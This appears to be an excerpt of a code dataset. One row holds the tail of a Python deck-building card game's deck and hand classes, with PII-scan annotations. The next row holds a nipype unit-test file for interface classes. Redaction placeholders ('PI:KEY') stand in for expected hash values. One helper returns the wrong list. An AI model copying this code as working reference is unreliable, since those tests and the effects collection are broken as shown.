self._undrawn: CardList = player_cards
shuffle(self._undrawn) # shuffled in place
self._discards: CardList = []
@staticmethod
def _validate_deck_size(cards: CardList) -> None:
""""""Ensures that the starting deck contains the correct
number of cards
Parameters
----------
cards : CardList
The tentative starting deck
Raises
------
PlayerDeckInitSize
Raised if the tentative starting deck is not the correct size
""""""
if len(cards) != PlayerDeck.starting_size:
raise PlayerDeckInitSize(len(cards))
return
@staticmethod
def _validate_deck_contents(cards) -> None:
""""""Ensures that the tentative starting deck contains only Vipers and Scouts
Parameters
----------
cards : CardList
The tentative starting deck
Raises
------
PlayerDeckInitContents
Raised if the tentative starting deck contains cards other than Vipers or Scouts
""""""
for c in cards:
if (c.name != 'Viper') and (c.name != 'Scout'):
raise PlayerDeckInitContents(c.name)
return
def _next_card(self) -> Card:
""""""Produces the next card from the player's deck
Attempts to draw a card from the top of the undrawn pile. If
the undrawn pile is empty, the undrawn pile is replenished from
the discard pile and shuffled before attempting to draw a card again.
An attempt to draw a card from the undrawn pile while both the undrawn
pile and discard pile are empty will raise a ``PlayerDeckEmpty`` exception.
Returns
-------
Card
A card from the top of the undrawn pile
Raises
------
PlayerDeckEmpty
Raised when attempting to draw a card while both undrawn and discard
piles are empty
""""""
if len(self._undrawn) > 0:
return self._undrawn.pop()
elif len(self._discards) > 0:
self._refill_undrawn()
return self._undrawn.pop()
else:
raise PlayerDeckEmpty
@property
def cards_remaining(self) -> int:
""""""The total number of cards left in the undrawn and discard piles
Returns
-------
int
The number of cards left to draw from
""""""
return len(self._undrawn) + len(self._discards)
def _refill_undrawn(self) -> None:
""""""Refills the undrawn pile with cards from the discard pile
Note
----
The cards in the discard pile are shuffled before being placed
back into the undrawn pile
""""""
self._undrawn: CardList = self._discards
shuffle(self._undrawn) # shuffled in place
self._discards: CardList = []
return
def discard(self, card: Card) -> None:
""""""Sends the card to the discard pile
Parameters
----------
card : Card
The card to send to the discard pile
""""""
self._discards.append(card)
return
def draw(self, num=5) -> CardList:
""""""Draws the specified number of cards from the undrawn pile
Parameters
----------
num : int (Optional)
The number of cards to draw (Default is 5)
Returns
-------
List[Card]
The list of cards that were drawn
Raises
------
IndexError
Raised if no cards are left to draw, or the number of cards requested
is not a positive integer
Note
----
If there are cards remaining in the deck but there are fewer cards than
were requested, then as many cards as possible are returned.
""""""
if (num <= 0) or (self.cards_remaining == 0) or (not isinstance(num, int)):
raise IndexError
cards: CardList = []
for _ in range(num):
try:
cards.append(self._next_card())
except PlayerDeckEmpty:
break
return cards
def _scrap(self, card):
""""""
Permanently removes a card from the discard pile
""""""
pass
class MainDeck(object):
""""""The deck from which players can acquire cards
Parameters
----------
cardrepo : CardRepo
The repository from which the cards are obtained
""""""
def __init__(self, cardrepo: CardRepo):
self._repo: CardRepo = cardrepo
self._cards: CardList = self._repo.main_deck_cards()
shuffle(self._cards)
return
def next_card(self) -> Card:
""""""Produces the next card from the main deck
Returns
-------
Card
A card from the top of the main deck
Raises
------
MainDeckEmpty
Raised when attempting to draw a card when the deck is empty
""""""
if len(self._cards) > 0:
return self._cards.pop()
else:
raise MainDeckEmpty
class TradeRow(object):
""""""Presents the cards that players may acquire
Parameters
----------
maindeck : MainDeck
The deck from which the trade row is drawn
cardrepo : CardRepo
The repository from which cards are obtained
""""""
def __init__(self, maindeck: MainDeck, cardrepo: CardRepo):
self._maindeck: MainDeck = maindeck
self._repo: CardRepo = cardrepo
self._explorer = None
self._cards = []
@property
def available(self) -> CardList:
""""""Produces the list of all cards available for purchase
Returns
-------
List[Card]
The list of cards available for purchase
""""""
return self.cards + [self.explorer]
@property
def cards(self) -> CardList:
""""""Produces the list of cards available for purchase
from the main deck
Returns
-------
List[Card]
The list of available cards from the main deck
""""""
while len(self._cards) < 5:
try:
card: Card = self._maindeck.next_card()
except MainDeckEmpty:
break
self._cards.append(card)
return self._cards
@property
def explorer(self) -> Card:
""""""Produces the current Explorer available for purchase
Returns
-------
Card
The current Explorer
""""""
if self._explorer is None:
self._explorer: Card = self._repo.new_explorer()
return self._explorer
def acquire(self, uuid: str) -> Card:
""""""Produces the card with the specified UUID
Parameters
----------
uuid : str
The UUID of the card the player wishes to acquire
Returns
-------
Card
The card with the specified UUID
Raises
------
UUIDNotFoundError
Raised when the UUID of the requested card is not found
in the list of available cards
""""""
cards_bools = [c.uuid == uuid for c in self.cards]
if True in cards_bools:
i = cards_bools.index(True)
return self._cards.pop(i)
elif self.explorer.uuid == uuid:
card = self._explorer
self._explorer = None
return card
else:
raise UUIDNotFoundError
def scrap(self, uuid: str) -> None:
""""""Permanently removes a card from the trade row
Parameters
----------
uuid : str
The UUID of the card to remove
""""""
cards_bools = [c.uuid == uuid for c in self.cards]
if True in cards_bools:
i = cards_bools.index(True)
del self._cards[i]
elif self.explorer.uuid == uuid:
self._explorer = None
else:
raise UUIDNotFoundError
return
class Hand(object):
""""""The player's hand of cards
A Hand is made from a list of cards drawn from the undrawn pile of the player's deck,
as well as any bases that were played previously and have not been destroyed.
The processing of cards into a collection of effects is a multi-step process:
1. The basic effects are pulled from each card
2. The factions are tallied up to see which cards may activate their ally abilities
3. Ally abilities are pulled from each card
4. The effects are aggregated by their action types
5. Effects are applied in whatever order the user chooses
6. If cards are drawn as the result of an action, the effects list is updated
Parameters
----------
to_draw : int
The number of cards to draw initially
existing_bases : List[Card]
Any bases that were played previously and have not yet been destroyed
playerdeck : PlayerDeck
The player's deck
""""""
def __init__(self, to_draw: int, existing_bases: CardList, playerdeck: PlayerDeck):
if (to_draw < 0) or (to_draw > 5):
raise HandInitError
try:
drawn: CardList = playerdeck.draw(to_draw)
except IndexError:
drawn: CardList = []
self.cards = drawn + existing_bases
self._playerdeck = playerdeck
return
@staticmethod
def _collect_basic_effects(cards: List[Card]) -> List[EffectRecord]:
""""""Assembles a list of `EffectRecord`s from the cards in the hand
""""""
basic_effects: List[EffectRecord] = []
for c in cards:
effects: List[CardEffect] = c.effects_basic
records = [EffectRecord(target=e.target,
action=e.action,
value=e.value,
uuid=e.uuid,
provider=c.uuid)
for e in effects]
basic_effects += records
return records
@staticmethod
def _collect_ally_factions(cards: List[Card]) -> List[CardFaction]:
""""""Assembles a list of factions that should have their ally abilities activated
""""""
factions: CardFaction = [c.faction for c in cards]
if CardFaction.ALL in factions:
return [CardFaction.BLOB, CardFaction.STAR, CardFaction.FEDERATION, CardFaction.MACHINE]
counts = Counter(factions)
allies: List[CardFaction] = [key for key in counts.keys()
if counts[key] > 1 and key != CardFaction.UNALIGNED]
return allies
@staticmethod
def _collect_ally_effects(cards: List[Card], facs: List[CardFaction]) -> List[EffectRecord]:
""""""Assembles a list of the ally effects that are applicable
""""""
ally_effects: List[EffectRecord] = []
for c in cards:
effects: List[CardEffect] = c.effects_ally
records = [EffectRecord(target=e.target,
action=e.action,
value=e.value,
uuid=e.uuid,
provider=c.uuid)
for e in effects if c.faction in facs]
ally_effects += records
return ally_effects
def _collect_effects(self) -> List[EffectRecord]:
""""""Assembles a list of effects provided by the player's hand
""""""
basic_effects: List[EffectRecord] = Hand._collect_basic_effects(self.cards)
ally_factions: List[CardFaction] = Hand._collect_ally_factions(self.cards)
ally_effects: List[EffectRecord] = Hand._collect_ally_effects(self.cards, ally_factions)
return basic_effects + ally_effects
",13773,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Zach Mitchell'], ['PERSON', 'EffectRecord'], ['PERSON', 'str'], ['PERSON', 'str'], ['PERSON', 'MainDeck = maindeck'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ':: '], ['URL', 'email.com'], ['URL', 'PlayerDeck.st'], ['URL', 'c.na'], ['URL', 'c.na'], ['URL', 'c.na'], ['URL', 'self.ca'], ['URL', 'repo.ma'], ['URL', 'self.ca'], ['URL', 'maindeck.ne'], ['URL', 'repo.ne'], ['URL', 'self.ca'], ['URL', 'bools.in'], ['URL', 'self.ca'], ['URL', 'bools.in'], ['URL', 'self.ca'], ['URL', 'e.ac'], ['URL', 'e.va'], ['URL', 'CardFaction.AL'], ['URL', 'CardFaction.ST'], ['URL', 'CardFaction.MA'], ['URL', 'counts.ke'], ['URL', 'e.ac'], ['URL', 'e.va'], ['URL', 'self.ca'], ['URL', 'self.ca'], ['URL', 'self.ca']]"
52,"# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
from __future__ import print_function, unicode_literals
from future import standard_library
standard_library.install_aliases()
from builtins import open, str, bytes
import os
import tempfile
import shutil
import warnings
import simplejson as json
from nipype.testing import (assert_equal, assert_not_equal, assert_raises,
assert_true, assert_false, with_setup, package_check,
skipif, example_data)
import nipype.interfaces.base as nib
from nipype.utils.filemanip import split_filename
from nipype.interfaces.base import Undefined, config
from traits.testing.nose_tools import skip
import traits.api as traits
def test_bunch():
b = nib.Bunch()
yield assert_equal, b.__dict__, {}
b = nib.Bunch(a=1, b=[2, 3])
yield assert_equal, b.__dict__, {'a': 1, 'b': [2, 3]}
def test_bunch_attribute():
b = nib.Bunch(a=1, b=[2, 3], c=None)
yield assert_equal, b.a, 1
yield assert_equal, b.b, [2, 3]
yield assert_equal, b.c, None
def test_bunch_repr():
b = nib.Bunch(b=2, c=3, a=dict(n=1, m=2))
yield assert_equal, repr(b), ""Bunch(a={'m': 2, 'n': 1}, b=2, c=3)""
def test_bunch_methods():
b = nib.Bunch(a=2)
b.update(a=3)
newb = b.dictcopy()
yield assert_equal, b.a, 3
yield assert_equal, b.get('a'), 3
yield assert_equal, b.get('badkey', 'otherthing'), 'otherthing'
yield assert_not_equal, b, newb
yield assert_equal, type(dict()), type(newb)
yield assert_equal, newb['a'], 3
def test_bunch_hash():
# NOTE: Since the path to the json file is included in the Bunch,
# the hash will be unique to each machine.
pth = os.path.split(os.path.abspath(__file__))[0]
json_pth = os.path.join(pth, 'realign_json.json')
b = nib.Bunch(infile=json_pth,
otherthing='blue',
yat=True)
newbdict, bhash = b._get_bunch_hash()
yield assert_equal, bhash, 'PI:KEY'
# Make sure the hash stored in the json file for `infile` is correct.
jshash = nib.md5()
with open(json_pth, 'r') as fp:
jshash.update(fp.read().encode('utf-8'))
yield assert_equal, newbdict['infile'][0][1], jshash.hexdigest()
yield assert_equal, newbdict['yat'], True
# create a temp file
# global tmp_infile, tmp_dir
# tmp_infile = None
# tmp_dir = None
def setup_file():
# global tmp_infile, tmp_dir
tmp_dir = tempfile.mkdtemp()
tmp_infile = os.path.join(tmp_dir, 'foo.txt')
with open(tmp_infile, 'w') as fp:
fp.writelines(['123456789'])
return tmp_infile
def teardown_file(tmp_dir):
shutil.rmtree(tmp_dir)
def test_TraitedSpec():
yield assert_true, nib.TraitedSpec().get_hashval()
yield assert_equal, nib.TraitedSpec().__repr__(), '\n\n'
class spec(nib.TraitedSpec):
foo = nib.traits.Int
goo = nib.traits.Float(usedefault=True)
yield assert_equal, spec().foo, Undefined
yield assert_equal, spec().goo, 0.0
specfunc = lambda x: spec(hoo=x)
yield assert_raises, nib.traits.TraitError, specfunc, 1
infields = spec(foo=1)
hashval = ([('foo', 1), ('goo', '0.0000000000')], 'PI:KEY')
yield assert_equal, infields.get_hashval(), hashval
# yield assert_equal, infields.hashval[1], hashval[1]
yield assert_equal, infields.__repr__(), '\nfoo = 1\ngoo = 0.0\n'
@skip
def test_TraitedSpec_dynamic():
from pickle import dumps, loads
a = nib.BaseTraitedSpec()
a.add_trait('foo', nib.traits.Int)
a.foo = 1
assign_a = lambda: setattr(a, 'foo', 'a')
yield assert_raises, Exception, assign_a
pkld_a = dumps(a)
unpkld_a = loads(pkld_a)
assign_a_again = lambda: setattr(unpkld_a, 'foo', 'a')
yield assert_raises, Exception, assign_a_again
def test_TraitedSpec_logic():
class spec3(nib.TraitedSpec):
_xor_inputs = ('foo', 'bar')
foo = nib.traits.Int(xor=_xor_inputs,
desc='foo or bar, not both')
bar = nib.traits.Int(xor=_xor_inputs,
desc='bar or foo, not both')
kung = nib.traits.Float(requires=('foo',),
position=0,
desc='kung foo')
class out3(nib.TraitedSpec):
output = nib.traits.Int
class MyInterface(nib.BaseInterface):
input_spec = spec3
output_spec = out3
myif = MyInterface()
yield assert_raises, TypeError, setattr(myif.inputs, 'kung', 10.0)
myif.inputs.foo = 1
yield assert_equal, myif.inputs.foo, 1
set_bar = lambda: setattr(myif.inputs, 'bar', 1)
yield assert_raises, IOError, set_bar
yield assert_equal, myif.inputs.foo, 1
myif.inputs.kung = 2
yield assert_equal, myif.inputs.kung, 2.0
def test_deprecation():
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec1(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='0.1')
spec_instance = DeprecationSpec1()
set_foo = lambda: setattr(spec_instance, 'foo', 1)
yield assert_raises, nib.TraitError, set_foo
yield assert_equal, len(w), 0, 'no warnings, just errors'
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec1numeric(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='0.1')
spec_instance = DeprecationSpec1numeric()
set_foo = lambda: setattr(spec_instance, 'foo', 1)
yield assert_raises, nib.TraitError, set_foo
yield assert_equal, len(w), 0, 'no warnings, just errors'
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec2(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='100', new_name='bar')
spec_instance = DeprecationSpec2()
set_foo = lambda: setattr(spec_instance, 'foo', 1)
yield assert_raises, nib.TraitError, set_foo
yield assert_equal, len(w), 0, 'no warnings, just errors'
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec3(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='1000', new_name='bar')
bar = nib.traits.Int()
spec_instance = DeprecationSpec3()
not_raised = True
try:
spec_instance.foo = 1
except nib.TraitError:
not_raised = False
yield assert_true, not_raised
yield assert_equal, len(w), 1, 'deprecated warning 1 %s' % [w1.message for w1 in w]
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec3(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='1000', new_name='bar')
bar = nib.traits.Int()
spec_instance = DeprecationSpec3()
not_raised = True
try:
spec_instance.foo = 1
except nib.TraitError:
not_raised = False
yield assert_true, not_raised
yield assert_equal, spec_instance.foo, Undefined
yield assert_equal, spec_instance.bar, 1
yield assert_equal, len(w), 1, 'deprecated warning 2 %s' % [w1.message for w1 in w]
def test_namesource():
tmp_infile = setup_file()
tmpd, nme, ext = split_filename(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
class spec2(nib.CommandLineInputSpec):
moo = nib.File(name_source=['doo'], hash_files=False, argstr=""%s"",
position=2)
doo = nib.File(exists=True, argstr=""%s"", position=1)
goo = traits.Int(argstr=""%d"", position=4)
poo = nib.File(name_source=['goo'], hash_files=False, argstr=""%s"", position=3)
class TestName(nib.CommandLine):
_cmd = ""mycommand""
input_spec = spec2
testobj = TestName()
testobj.inputs.doo = tmp_infile
testobj.inputs.goo = 99
yield assert_true, '%s_generated' % nme in testobj.cmdline
testobj.inputs.moo = ""my_%s_template""
yield assert_true, 'my_%s_template' % nme in testobj.cmdline
os.chdir(pwd)
teardown_file(tmpd)
def test_chained_namesource():
tmp_infile = setup_file()
tmpd, nme, ext = split_filename(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
class spec2(nib.CommandLineInputSpec):
doo = nib.File(exists=True, argstr=""%s"", position=1)
moo = nib.File(name_source=['doo'], hash_files=False, argstr=""%s"",
position=2, name_template='%s_mootpl')
poo = nib.File(name_source=['moo'], hash_files=False,
argstr=""%s"", position=3)
class TestName(nib.CommandLine):
_cmd = ""mycommand""
input_spec = spec2
testobj = TestName()
testobj.inputs.doo = tmp_infile
res = testobj.cmdline
yield assert_true, '%s' % tmp_infile in res
yield assert_true, '%s_mootpl ' % nme in res
yield assert_true, '%s_mootpl_generated' % nme in res
os.chdir(pwd)
teardown_file(tmpd)
def test_cycle_namesource1():
tmp_infile = setup_file()
tmpd, nme, ext = split_filename(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
class spec3(nib.CommandLineInputSpec):
moo = nib.File(name_source=['doo'], hash_files=False, argstr=""%s"",
position=1, name_template='%s_mootpl')
poo = nib.File(name_source=['moo'], hash_files=False,
argstr=""%s"", position=2)
doo = nib.File(name_source=['poo'], hash_files=False,
argstr=""%s"", position=3)
class TestCycle(nib.CommandLine):
_cmd = ""mycommand""
input_spec = spec3
# Check that an exception is raised
to0 = TestCycle()
not_raised = True
try:
to0.cmdline
except nib.NipypeInterfaceError:
not_raised = False
yield assert_false, not_raised
os.chdir(pwd)
teardown_file(tmpd)
def test_cycle_namesource2():
tmp_infile = setup_file()
tmpd, nme, ext = split_filename(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
class spec3(nib.CommandLineInputSpec):
moo = nib.File(name_source=['doo'], hash_files=False, argstr=""%s"",
position=1, name_template='%s_mootpl')
poo = nib.File(name_source=['moo'], hash_files=False,
argstr=""%s"", position=2)
doo = nib.File(name_source=['poo'], hash_files=False,
argstr=""%s"", position=3)
class TestCycle(nib.CommandLine):
_cmd = ""mycommand""
input_spec = spec3
# Check that loop can be broken by setting one of the inputs
to1 = TestCycle()
to1.inputs.poo = tmp_infile
not_raised = True
try:
res = to1.cmdline
except nib.NipypeInterfaceError:
not_raised = False
print(res)
yield assert_true, not_raised
yield assert_true, '%s' % tmp_infile in res
yield assert_true, '%s_generated' % nme in res
yield assert_true, '%s_generated_mootpl' % nme in res
os.chdir(pwd)
teardown_file(tmpd)
def checknose():
""""""check version of nose for known incompatability""""""
mod = __import__('nose')
if mod.__versioninfo__[1] <= 11:
return 0
else:
return 1
@skipif(checknose)
def test_TraitedSpec_withFile():
tmp_infile = setup_file()
tmpd, nme = os.path.split(tmp_infile)
yield assert_true, os.path.exists(tmp_infile)
class spec2(nib.TraitedSpec):
moo = nib.File(exists=True)
doo = nib.traits.List(nib.File(exists=True))
infields = spec2(moo=tmp_infile, doo=[tmp_infile])
hashval = infields.get_hashval(hash_method='content')
yield assert_equal, hashval[1], 'PI:KEY'
teardown_file(tmpd)
@skipif(checknose)
def test_TraitedSpec_withNoFileHashing():
tmp_infile = setup_file()
tmpd, nme = os.path.split(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
yield assert_true, os.path.exists(tmp_infile)
class spec2(nib.TraitedSpec):
moo = nib.File(exists=True, hash_files=False)
doo = nib.traits.List(nib.File(exists=True))
infields = spec2(moo=nme, doo=[tmp_infile])
hashval = infields.get_hashval(hash_method='content')
yield assert_equal, hashval[1], 'PI:KEY'
class spec3(nib.TraitedSpec):
moo = nib.File(exists=True, name_source=""doo"")
doo = nib.traits.List(nib.File(exists=True))
infields = spec3(moo=nme, doo=[tmp_infile])
hashval1 = infields.get_hashval(hash_method='content')
class spec4(nib.TraitedSpec):
moo = nib.File(exists=True)
doo = nib.traits.List(nib.File(exists=True))
infields = spec4(moo=nme, doo=[tmp_infile])
hashval2 = infields.get_hashval(hash_method='content')
yield assert_not_equal, hashval1[1], hashval2[1]
os.chdir(pwd)
teardown_file(tmpd)
def test_Interface():
yield assert_equal, nib.Interface.input_spec, None
yield assert_equal, nib.Interface.output_spec, None
yield assert_raises, NotImplementedError, nib.Interface
yield assert_raises, NotImplementedError, nib.Interface.help
yield assert_raises, NotImplementedError, nib.Interface._inputs_help
yield assert_raises, NotImplementedError, nib.Interface._outputs_help
yield assert_raises, NotImplementedError, nib.Interface._outputs
class DerivedInterface(nib.Interface):
def __init__(self):
pass
nif = DerivedInterface()
yield assert_raises, NotImplementedError, nif.run
yield assert_raises, NotImplementedError, nif.aggregate_outputs
yield assert_raises, NotImplementedError, nif._list_outputs
yield assert_raises, NotImplementedError, nif._get_filecopy_info
def test_BaseInterface():
yield assert_equal, nib.BaseInterface.help(), None
yield assert_equal, nib.BaseInterface._get_filecopy_info(), []
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
goo = nib.traits.Int(desc='a random int', mandatory=True)
moo = nib.traits.Int(desc='a random int', mandatory=False)
hoo = nib.traits.Int(desc='a random int', usedefault=True)
zoo = nib.File(desc='a file', copyfile=False)
woo = nib.File(desc='a file', copyfile=True)
class OutputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
class DerivedInterface(nib.BaseInterface):
input_spec = InputSpec
yield assert_equal, DerivedInterface.help(), None
yield assert_true, 'moo' in ''.join(DerivedInterface._inputs_help())
yield assert_equal, DerivedInterface()._outputs(), None
yield assert_equal, DerivedInterface._get_filecopy_info()[0]['key'], 'woo'
yield assert_true, DerivedInterface._get_filecopy_info()[0]['copy']
yield assert_equal, DerivedInterface._get_filecopy_info()[1]['key'], 'zoo'
yield assert_false, DerivedInterface._get_filecopy_info()[1]['copy']
yield assert_equal, DerivedInterface().inputs.foo, Undefined
yield assert_raises, ValueError, DerivedInterface()._check_mandatory_inputs
yield assert_equal, DerivedInterface(goo=1)._check_mandatory_inputs(), None
yield assert_raises, ValueError, DerivedInterface().run
yield assert_raises, NotImplementedError, DerivedInterface(goo=1).run
class DerivedInterface2(DerivedInterface):
output_spec = OutputSpec
def _run_interface(self, runtime):
return runtime
yield assert_equal, DerivedInterface2.help(), None
yield assert_equal, DerivedInterface2()._outputs().foo, Undefined
yield assert_raises, NotImplementedError, DerivedInterface2(goo=1).run
nib.BaseInterface.input_spec = None
yield assert_raises, Exception, nib.BaseInterface
def test_BaseInterface_load_save_inputs():
tmp_dir = tempfile.mkdtemp()
tmp_json = os.path.join(tmp_dir, 'settings.json')
class InputSpec(nib.TraitedSpec):
input1 = nib.traits.Int()
input2 = nib.traits.Float()
input3 = nib.traits.Bool()
input4 = nib.traits.Str()
class DerivedInterface(nib.BaseInterface):
input_spec = InputSpec
def __init__(self, **inputs):
super(DerivedInterface, self).__init__(**inputs)
inputs_dict = {'input1': 12, 'input3': True,
'input4': 'some string'}
bif = DerivedInterface(**inputs_dict)
bif.save_inputs_to_json(tmp_json)
bif2 = DerivedInterface()
bif2.load_inputs_from_json(tmp_json)
yield assert_equal, bif2.inputs.get_traitsfree(), inputs_dict
bif3 = DerivedInterface(from_file=tmp_json)
yield assert_equal, bif3.inputs.get_traitsfree(), inputs_dict
inputs_dict2 = inputs_dict.copy()
inputs_dict2.update({'input4': 'some other string'})
bif4 = DerivedInterface(from_file=tmp_json, input4=inputs_dict2['input4'])
yield assert_equal, bif4.inputs.get_traitsfree(), inputs_dict2
bif5 = DerivedInterface(input4=inputs_dict2['input4'])
bif5.load_inputs_from_json(tmp_json, overwrite=False)
yield assert_equal, bif5.inputs.get_traitsfree(), inputs_dict2
bif6 = DerivedInterface(input4=inputs_dict2['input4'])
bif6.load_inputs_from_json(tmp_json)
yield assert_equal, bif6.inputs.get_traitsfree(), inputs_dict
# test get hashval in a complex interface
from nipype.interfaces.ants import Registration
settings = example_data(example_data('smri_ants_registration_settings.json'))
with open(settings) as setf:
data_dict = json.load(setf)
tsthash = Registration()
tsthash.load_inputs_from_json(settings)
yield assert_equal, {}, check_dict(data_dict, tsthash.inputs.get_traitsfree())
tsthash2 = Registration(from_file=settings)
yield assert_equal, {}, check_dict(data_dict, tsthash2.inputs.get_traitsfree())
_, hashvalue = tsthash.inputs.get_hashval(hash_method='timestamp')
yield assert_equal, 'ec5755e07287e04a4b409e03b77a517c', hashvalue
def test_input_version():
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
obj = DerivedInterface1()
yield assert_not_raises, obj._check_version_requirements, obj.inputs
config.set('execution', 'stop_on_unknown_version', True)
yield assert_raises, Exception, obj._check_version_requirements, obj.inputs
config.set_default_config()
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
_version = '0.8'
obj = DerivedInterface1()
obj.inputs.foo = 1
yield assert_raises, Exception, obj._check_version_requirements
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
_version = '0.10'
obj = DerivedInterface1()
yield assert_not_raises, obj._check_version_requirements, obj.inputs
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
_version = '0.9'
obj = DerivedInterface1()
obj.inputs.foo = 1
not_raised = True
yield assert_not_raises, obj._check_version_requirements, obj.inputs
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', max_ver='0.7')
class DerivedInterface2(nib.BaseInterface):
input_spec = InputSpec
_version = '0.8'
obj = DerivedInterface2()
obj.inputs.foo = 1
yield assert_raises, Exception, obj._check_version_requirements
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', max_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
_version = '0.9'
obj = DerivedInterface1()
obj.inputs.foo = 1
not_raised = True
yield assert_not_raises, obj._check_version_requirements, obj.inputs
def test_output_version():
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
class OutputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
output_spec = OutputSpec
_version = '0.10'
obj = DerivedInterface1()
yield assert_equal, obj._check_version_requirements(obj._outputs()), []
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
class OutputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.11')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
output_spec = OutputSpec
_version = '0.10'
obj = DerivedInterface1()
yield assert_equal, obj._check_version_requirements(obj._outputs()), ['foo']
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
class OutputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.11')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
output_spec = OutputSpec
_version = '0.10'
def _run_interface(self, runtime):
return runtime
def _list_outputs(self):
return {'foo': 1}
obj = DerivedInterface1()
yield assert_raises, KeyError, obj.run
def test_Commandline():
yield assert_raises, Exception, nib.CommandLine
ci = nib.CommandLine(command='which')
yield assert_equal, ci.cmd, 'which'
yield assert_equal, ci.inputs.args, Undefined
ci2 = nib.CommandLine(command='which', args='ls')
yield assert_equal, ci2.cmdline, 'which ls'
ci3 = nib.CommandLine(command='echo')
ci3.inputs.environ = {'MYENV': 'foo'}
res = ci3.run()
yield assert_equal, res.runtime.environ['MYENV'], 'foo'
yield assert_equal, res.outputs, None
class CommandLineInputSpec1(nib.CommandLineInputSpec):
foo = nib.Str(argstr='%s', desc='a str')
goo = nib.traits.Bool(argstr='-g', desc='a bool', position=0)
hoo = nib.traits.List(argstr='-l %s', desc='a list')
moo = nib.traits.List(argstr='-i %d...', desc='a repeated list',
position=-1)
noo = nib.traits.Int(argstr='-x %d', desc='an int')
roo = nib.traits.Str(desc='not on command line')
soo = nib.traits.Bool(argstr=""-soo"")
nib.CommandLine.input_spec = CommandLineInputSpec1
ci4 = nib.CommandLine(command='cmd')
ci4.inputs.foo = 'foo'
ci4.inputs.goo = True
ci4.inputs.hoo = ['a', 'b']
ci4.inputs.moo = [1, 2, 3]
ci4.inputs.noo = 0
ci4.inputs.roo = 'hello'
ci4.inputs.soo = False
cmd = ci4._parse_inputs()
yield assert_equal, cmd[0], '-g'
yield assert_equal, cmd[-1], '-i 1 -i 2 -i 3'
yield assert_true, 'hello' not in ' '.join(cmd)
yield assert_true, '-soo' not in ' '.join(cmd)
ci4.inputs.soo = True
cmd = ci4._parse_inputs()
yield assert_true, '-soo' in ' '.join(cmd)
class CommandLineInputSpec2(nib.CommandLineInputSpec):
foo = nib.File(argstr='%s', desc='a str', genfile=True)
nib.CommandLine.input_spec = CommandLineInputSpec2
ci5 = nib.CommandLine(command='cmd')
yield assert_raises, NotImplementedError, ci5._parse_inputs
class DerivedClass(nib.CommandLine):
input_spec = CommandLineInputSpec2
def _gen_filename(self, name):
return 'filename'
ci6 = DerivedClass(command='cmd')
yield assert_equal, ci6._parse_inputs()[0], 'filename'
nib.CommandLine.input_spec = nib.CommandLineInputSpec
def test_Commandline_environ():
from nipype import config
config.set_default_config()
ci3 = nib.CommandLine(command='echo')
res = ci3.run()
yield assert_equal, res.runtime.environ['DISPLAY'], ':1'
config.set('execution', 'display_variable', ':3')
res = ci3.run()
yield assert_false, 'DISPLAY' in ci3.inputs.environ
yield assert_equal, res.runtime.environ['DISPLAY'], ':3'
ci3.inputs.environ = {'DISPLAY': ':2'}
res = ci3.run()
yield assert_equal, res.runtime.environ['DISPLAY'], ':2'
def test_CommandLine_output():
tmp_infile = setup_file()
tmpd, name = os.path.split(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
yield assert_true, os.path.exists(tmp_infile)
ci = nib.CommandLine(command='ls -l')
ci.inputs.terminal_output = 'allatonce'
res = ci.run()
yield assert_equal, res.runtime.merged, ''
yield assert_true, name in res.runtime.stdout
ci = nib.CommandLine(command='ls -l')
ci.inputs.terminal_output = 'file'
res = ci.run()
yield assert_true, 'stdout.nipype' in res.runtime.stdout
yield assert_true, isinstance(res.runtime.stdout, (str, bytes))
ci = nib.CommandLine(command='ls -l')
ci.inputs.terminal_output = 'none'
res = ci.run()
yield assert_equal, res.runtime.stdout, ''
